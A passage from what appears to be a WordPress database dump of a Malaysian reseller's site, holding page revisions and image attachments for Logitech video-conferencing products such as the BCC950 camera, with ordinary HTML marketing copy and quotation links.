09:30:11','',0,'https://bintara.com.my/?page_id=2972',0,'page','',0),(2973,1,'2019-03-04 14:42:38','2019-03-04 06:42:38','','Logitech BCC950','','inherit','closed','closed','','2972-revision-v1','','','2019-03-04 14:42:38','2019-03-04 06:42:38','',2972,'https://bintara.com.my/blog/2019/03/04/2972-revision-v1/',0,'revision','',0),(2974,1,'2019-03-04 14:44:45','2019-03-04 06:44:45','','conferencecam-bcc950 (1)','','inherit','closed','closed','','conferencecam-bcc950-1','','','2019-03-04 14:44:45','2019-03-04 06:44:45','',2972,'https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.png',0,'attachment','image/png',0),(2975,1,'2019-03-04 14:46:30','2019-03-04 06:46:30','','conferencecam-bcc950','','inherit','closed','closed','','conferencecam-bcc950-2','','','2019-03-04 14:46:30','2019-03-04 06:46:30','',2972,'https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg',0,'attachment','image/jpeg',0),(2976,1,'2019-03-04 14:47:33','2019-03-04 06:47:33','','conferencecam-bcc950 (1)','','inherit','closed','closed','','conferencecam-bcc950-1-2','','','2019-03-04 14:47:33','2019-03-04 06:47:33','',2972,'https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg',0,'attachment','image/jpeg',0),(2977,1,'2019-03-04 14:49:25','2019-03-04 06:49:25','','conferencecam-bcc950 (2)','','inherit','closed','closed','','conferencecam-bcc950-2-2','','','2019-03-04 14:49:25','2019-03-04 06:49:25','',2972,'https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg',0,'attachment','image/jpeg',0),(2981,1,'2019-03-04 14:54:52','2019-03-04 06:54:52','<p>BCC950</p><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p><ul><li>All-in-one design is easy to use and saves space</li><li>Plug-and-play convenience for Windows and Mac</li><li>Clear HD video and audio at an affordable price</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A GREAT VALUE FOR SMALL TEAMS</h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ALL-IN-ONE DESIGN</h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, itâ€™s everything you need to conduct a small video conference with up to 4 people in one room.</p><h3>PERFECT FOR PRODUCTIVE TEAMS</h3><p>With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EYE-TO-EYE</h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>NATURAL SOUND</h4><p>With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.</p><h4>HANDHELD REMOTE CONTROL</h4><p>Control BCC950â€™s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.</p><h4>USB PLUG-AND-PLAY CONNECTIVITY</h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. Thereâ€™s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.</p><h4>QUALITY OPTICS</h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180Â° across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.</p><p>[maxbutton id=\"3\" ]</p>','Logitech BCC950','','inherit','closed','closed','','2972-revision-v1','','','2019-03-04 14:54:52','2019-03-04 06:54:52','',2972,'https://bintara.com.my/blog/2019/03/04/2972-revision-v1/',0,'revision','',0),(2980,1,'2019-03-04 14:54:33','2019-03-04 06:54:33','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-meetup/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-connect/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-ptz-pro-2/\" role=\"button\">\n						View\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-03-04 14:54:33','2019-03-04 06:54:33','',16,'https://bintara.com.my/blog/2019/03/04/16-revision-v1/',0,'revision','',0),(2982,1,'2019-03-04 14:55:07','2019-03-04 06:55:07','<p>BCC950</p><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p><ul><li>All-in-one design is easy to use and saves space</li><li>Plug-and-play convenience for Windows and Mac</li><li>Clear HD video and audio at an affordable price</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A GREAT VALUE FOR SMALL TEAMS</h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ALL-IN-ONE DESIGN</h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, itâ€™s everything you need to conduct a small video conference with up to 4 people in one room.</p><h3>PERFECT FOR PRODUCTIVE TEAMS</h3><p>With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EYE-TO-EYE</h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>NATURAL SOUND</h4><p>With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.</p><h4>HANDHELD REMOTE CONTROL</h4><p>Control BCC950â€™s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.</p><h4>USB PLUG-AND-PLAY CONNECTIVITY</h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. Thereâ€™s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.</p><h4>QUALITY OPTICS</h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180Â° across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.</p><p>[maxbutton id=\"3\" ]</p>','Logitech BCC950','','inherit','closed','closed','','2972-revision-v1','','','2019-03-04 14:55:07','2019-03-04 06:55:07','',2972,'https://bintara.com.my/blog/2019/03/04/2972-revision-v1/',0,'revision','',0),(2983,1,'2019-03-04 14:55:17','2019-03-04 06:55:17','<h2>BCC950</h2><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p><ul><li>All-in-one design is easy to use and saves space</li><li>Plug-and-play convenience for Windows and Mac</li><li>Clear HD video and audio at an affordable price</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A GREAT VALUE FOR SMALL TEAMS</h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>ALL-IN-ONE DESIGN</h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, itâ€™s everything you need to conduct a small video conference with up to 4 people in one room.</p><h3>PERFECT FOR PRODUCTIVE TEAMS</h3><p>With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-bcc950-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EYE-TO-EYE</h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>NATURAL SOUND</h4><p>With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.</p><h4>HANDHELD REMOTE CONTROL</h4><p>Control BCC950â€™s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.</p><h4>USB PLUG-AND-PLAY CONNECTIVITY</h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. Thereâ€™s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.</p><h4>QUALITY OPTICS</h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180Â° across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.</p><p>[maxbutton id=\"3\" ]</p>','Logitech BCC950','','inherit','closed','closed','','2972-revision-v1','','','2019-03-04 14:55:17','2019-03-04 06:55:17','',2972,'https://bintara.com.my/blog/2019/03/04/2972-revision-v1/',0,'revision','',0),(2984,1,'2019-03-04 14:58:31','2019-03-04 06:58:31','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" 